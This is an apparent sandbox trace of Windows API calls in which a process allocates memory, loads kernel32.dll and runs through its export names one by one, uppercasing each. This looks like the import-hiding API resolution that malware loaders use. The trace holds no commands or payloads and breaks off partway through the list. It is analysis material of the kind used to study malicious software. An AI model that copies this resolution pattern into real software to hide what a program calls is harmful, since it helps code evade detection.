[0077.077] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.078] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.078] GetTickCount () returned 0x114bc7c [0077.078] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.078] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0077.078] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0077.078] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0077.079] lstrlenA (lpString="kernel32.dll") returned 12 [0077.079] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0077.079] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0077.079] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0077.079] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0077.079] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0077.079] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0077.079] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0077.079] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0077.079] lstrlenA (lpString="ADDATOMA") returned 8 [0077.079] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0077.079] lstrlenA (lpString="ADDATOMW") returned 8 [0077.079] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0077.079] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0077.079] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0077.079] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0077.079] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0077.079] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0077.079] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0077.079] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0077.079] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0077.079] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0077.079] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0077.079] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0077.079] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0077.079] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0077.079] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0077.079] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0077.079] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0077.079] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0077.079] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0077.080] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0077.080] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0077.080] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0077.080] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0077.080] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0077.080] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0077.080] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0077.080] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0077.080] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0077.080] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0077.080] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0077.080] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0077.080] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0077.080] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0077.080] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0077.080] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0077.080] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0077.080] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0077.080] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0077.080] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0077.080] lstrlenA (lpString="BACKUPREAD") returned 10 [0077.080] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0077.080] lstrlenA (lpString="BACKUPSEEK") returned 10 [0077.080] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0077.080] lstrlenA (lpString="BACKUPWRITE") returned 11 [0077.080] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0077.080] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0077.080] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0077.080] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0077.080] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0077.080] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0077.080] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0077.080] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0077.080] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0077.080] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0077.080] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0077.080] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0077.081] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0077.081] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0077.081] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0077.081] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0077.081] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0077.081] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0077.081] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0077.081] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0077.081] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0077.081] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0077.081] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0077.081] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0077.081] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0077.081] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0077.081] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0077.081] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0077.081] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0077.081] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0077.081] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0077.081] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0077.081] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0077.081] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0077.081] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0077.081] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0077.081] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0077.081] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0077.081] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0077.081] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0077.081] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0077.081] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0077.081] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0077.081] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0077.081] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0077.081] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0077.081] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0077.081] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0077.081] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0077.082] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0077.082] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0077.082] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0077.082] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0077.082] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0077.082] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0077.082] lstrlenA (lpString="BEEP") returned 4 [0077.082] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0077.082] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0077.082] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0077.082] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0077.082] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0077.082] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0077.082] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0077.082] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0077.082] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0077.082] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0077.082] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0077.082] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0077.082] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0077.082] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0077.082] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0077.082] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0077.082] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0077.082] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0077.082] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0077.082] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0077.082] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0077.082] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0077.082] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0077.082] lstrlenA (lpString="CANCELIO") returned 8 [0077.082] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0077.082] lstrlenA (lpString="CANCELIOEX") returned 10 [0077.082] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0077.082] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0077.082] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0077.082] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0077.082] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0077.083] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0077.083] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0077.083] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0077.083] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0077.083] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0077.083] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0077.083] lstrlenA (lpString="CHECKELEVATION") returned 14 [0077.083] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0077.083] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0077.083] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0077.083] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0077.083] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0077.083] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0077.083] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0077.083] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0077.083] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0077.083] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0077.083] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0077.083] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0077.083] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0077.083] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0077.083] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0077.083] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0077.083] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0077.083] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0077.083] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0077.083] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0077.083] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0077.083] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0077.083] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0077.083] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0077.083] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0077.083] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0077.083] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0077.083] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0077.083] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0077.083] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0077.084] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0077.084] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0077.084] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0077.084] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0077.084] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0077.084] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0077.084] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0077.084] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0077.084] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0077.084] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0077.084] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0077.084] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0077.084] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0077.084] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0077.084] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0077.084] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0077.084] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0077.084] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0077.084] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0077.084] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0077.084] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0077.084] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0077.084] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0077.084] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0077.084] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0077.084] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0077.084] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0077.084] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0077.084] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0077.084] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0077.084] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0077.084] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0077.084] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0077.084] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0077.084] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0077.084] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0077.084] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0077.085] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0077.085] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0077.085] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0077.085] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0077.085] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0077.085] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0077.085] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0077.085] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0077.085] lstrlenA (lpString="COPYCONTEXT") returned 11 [0077.085] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0077.085] lstrlenA (lpString="COPYFILEA") returned 9 [0077.085] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0077.085] lstrlenA (lpString="COPYFILEEXA") returned 11 [0077.085] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0077.085] lstrlenA (lpString="COPYFILEEXW") returned 11 [0077.085] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0077.085] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0077.085] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0077.085] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0077.085] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" 